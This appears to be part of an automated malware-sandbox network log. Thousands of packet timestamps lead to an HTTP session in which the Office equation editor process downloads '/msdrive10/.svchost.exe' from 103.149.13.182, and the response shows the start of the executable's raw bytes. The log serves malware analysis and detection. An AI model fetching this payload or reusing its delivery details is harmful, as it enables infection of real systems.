                  May 12, 2022 09:27:58.442879915 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442898989 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442915916 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442936897 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442959070 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442981005 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442994118 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.443001032 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.443003893 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.443005085 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.443073034 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.443103075 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446660042 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446691036 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446712971 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446738005 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446762085 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446784019 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446805954 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446827888 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446824074 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446851969 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446862936 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446866989 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446868896 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446872950 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446877003 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446897030 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446902037 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446921110 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446926117 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446938992 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446948051 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446966887 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446971893 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.446986914 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.446995020 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447011948 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447017908 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447038889 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447041035 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447057009 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447063923 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447078943 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447087049 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447107077 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447108984 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447127104 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447132111 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447154045 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447159052 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447175980 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447180986 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447199106 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.447199106 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447216034 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447218895 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.447236061 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.459935904 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.462074995 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.665867090 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.665934086 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.665975094 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.666008949 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.666013002 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.666034937 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.666047096 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.666054010 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.666090012 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.666093111 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.666127920 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.666135073 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.666173935 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.666176081 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.666214943 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672641039 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672699928 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672704935 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672738075 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672740936 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672780037 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672781944 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672823906 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672864914 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672878981 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672883034 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672903061 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672904968 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672940016 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.672944069 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672983885 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.672988892 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673022032 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673022985 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673062086 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673062086 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673099995 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673100948 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673140049 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673141003 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673176050 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673182011 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673219919 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673221111 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673258066 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673263073 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673300028 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673302889 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673340082 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673341990 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673378944 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673383951 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673410892 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673424006 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673425913 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673461914 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673464060 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673501968 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673506021 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673543930 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673544884 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673579931 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673583031 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673623085 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673624992 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673661947 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673682928 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673696995 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673701048 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673738956 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673741102 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673779964 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673796892 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673810959 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673823118 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673861027 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673877001 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673899889 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673901081 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673940897 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.673948050 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.673979998 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.674000025 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.674021006 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.674021006 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.674079895 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.682565928 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.682626009 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.682647943 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.682656050 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.682703018 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.682708025 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.684993982 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.685060978 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.685060978 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.685112000 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.692693949 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.888905048 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.888942003 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.888958931 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.888977051 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.888993979 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.889009953 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.889027119 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.889117956 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.891944885 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897017002 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897048950 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897064924 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897077084 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897093058 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897109985 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897121906 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897134066 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897147894 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897161961 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897173882 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897185087 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897197962 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897212029 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897223949 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897236109 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897252083 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897268057 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897281885 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.897310972 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897367954 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897375107 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897380114 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897383928 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.897907972 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915276051 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915318966 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915342093 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915363073 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915385008 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915405989 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915489912 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915512085 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915533066 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915535927 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915554047 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915575981 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915584087 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915596008 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915599108 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915620089 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915638924 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915641069 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915664911 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915713072 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915738106 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915759087 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915781021 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915803909 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915806055 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915826082 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915832996 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915848970 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915863037 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915868998 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915889978 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.915890932 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.915935993 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:58.915955067 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:58.917907953 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.112030029 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112095118 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112138033 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112179995 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112219095 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112261057 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112301111 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112338066 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.112591982 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.112648010 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.112658024 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.112663031 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.112668037 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.114722967 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.114767075 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.114804029 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.114845037 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.114883900 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.114923954 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.114929914 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.114984035 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.114989042 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.115025997 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120239019 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120284081 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120326042 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120363951 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120404005 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120443106 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120445967 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120505095 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120518923 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120563030 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120563984 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120600939 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120604038 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120644093 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120646954 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120688915 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120687962 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120732069 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120733976 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120770931 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120770931 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120814085 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120852947 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120857000 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120897055 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120938063 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120943069 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.120978117 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.120980978 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121016979 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121018887 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121057987 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121062040 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121100903 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121134996 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121140957 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121148109 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121182919 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121184111 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121222973 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121264935 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121301889 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121305943 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121341944 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:27:59.121345997 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121381044 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121448994 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:27:59.121457100 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:28:02.841547012 CEST  49173  80  192.168.2.22  103.149.13.182
                  May 12, 2022 09:28:03.041457891 CEST  80  49173  103.149.13.182  192.168.2.22
                  May 12, 2022 09:28:03.041631937 CEST  49173  80  192.168.2.22  103.149.13.182
                  • 103.149.13.182
                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                  0  192.168.2.22  49173  103.149.13.182  80  C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp  kBytes transferred  Direction  Data
                  May 12, 2022 09:27:57.325670004 CEST  2  OUT  GET /msdrive10/.svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 103.149.13.182
                  Connection: Keep-Alive
                  May 12, 2022 09:27:57.549187899 CEST  3  IN  HTTP/1.1 200 OK
                  Date: Thu, 12 May 2022 07:27:56 GMT
                  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                  Last-Modified: Tue, 10 May 2022 23:41:34 GMT
                  ETag: "4fcbf-5deb0dd783b2f"
                  Accept-Ranges: bytes
                  Content-Length: 326847
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 
